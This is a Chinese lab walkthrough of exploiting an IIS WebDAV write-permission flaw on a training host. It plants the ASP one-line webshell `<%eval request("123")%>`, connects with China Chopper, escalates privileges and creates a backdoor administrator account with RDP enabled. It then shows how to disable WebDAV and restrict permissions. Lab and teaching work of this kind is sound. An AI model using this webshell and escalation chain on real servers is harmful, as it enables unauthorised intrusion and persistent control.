i春秋实验--IIS写权限漏洞利用
http://www.ichunqiu.com/vm/69/1目标网址:172.16.12.2
1、扫描目标IIS写入权限
打开浏览器,输入172.16.12.2回车显示是“建设中的IIS服务器”
https://images2015.cnblogs.com/blog/1107163/201703/1107163-20170309121016578-1524674348.png
打开IISPutScanner.exe应用扫描服务器,输入startIP172.16.12.2和endIP172.16.12.2(也可以扫描整个网段),点击Scan进行扫描,如PUT现实为YES则表明服务器存在IIS写权限漏洞。
https://images2015.cnblogs.com/blog/1107163/201703/1107163-20170309121515203-552186254.png
2、利用IIS写权限写入webshell
1)在桌面写asp一句话:<%eval request("123")%> 密码为123,保存为1.txt
2)使用IISWrite.exe软件,利用IIS写权限漏洞写入一句话木马
https://images2015.cnblogs.com/blog/1107163/201703/1107163-20170309122230531-751036144.png
点击提交数据包之前查看是否存在/test.txt文件,如不存在则点击提交数据包,系统会自动将提交的一句话木马生成test.txt文件。
https://images2015.cnblogs.com/blog/1107163/201703/1107163-20170309122445625-1697097736.png
https://images2015.cnblogs.com/blog/1107163/201703/1107163-20170309122636734-1261108318.png
提交数据包后系统自动生成test.txt,内容为上传的一句话木马。
https://images2015.cnblogs.com/blog/1107163/201703/1107163-20170309122701875-1315915463.png
test.txt里面的内容虽是一句话,但格式是.txt而不是.asp,所有需要使用IISWrite.exe中copy功能复制一份数据,数据名为shell.asp。此时访问172.16.12.2/shell.asp发现访问成功, 说明复制成功。
https://images2015.cnblogs.com/blog/1107163/201703/1107163-20170309124007063-1922967424.png
https://images2015.cnblogs.com/blog/1107163/201703/1107163-20170309124045469-401766371.png
使用中国菜刀连接http://172.16.12.2/shell.asp 密码123获取webshell
https://images2015.cnblogs.com/blog/1107163/201703/1107163-20170309124254766-1227238024.png
提权:
systeminfo显示只安装了一个补丁,所以可以尝试iis提权。
上传提权工具,iis6.exe pr.exe 3389.exe cmd.exe
https://images2015.cnblogs.com/blog/1107163/201703/1107163-20170309125201406-544010599.png
https://images2015.cnblogs.com/blog/1107163/201703/1107163-20170309125446453-1370316079.png
提升权限后,iis6.exe 3389(3389.exe默认打开服务器3389端口并新建用户admin,密码admin123并添加至管理员权限)
3、写权限漏洞修补
1)关闭WebDAV
https://images2015.cnblogs.com/blog/1107163/201703/1107163-20170309125901141-897251499.png
https://images2015.cnblogs.com/blog/1107163/201703/1107163-20170309125934703-14932230.png
2)网站权限中来宾权限只保留读写权限
https://images2015.cnblogs.com/blog/1107163/201703/1107163-20170309130142844-1054536399.png
https://images2015.cnblogs.com/blog/1107163/201703/1107163-20170309130203969-436733130.png
使用IISPutScanner测试,PUT显示为NO;
https://images2015.cnblogs.com/blog/1107163/201703/1107163-20170309130334797-702476069.png
使用IISWrite测试,提示501
https://images2015.cnblogs.com/blog/1107163/201703/1107163-20170309130500641-702632608.png
说明漏洞修复成功。
页:
[1]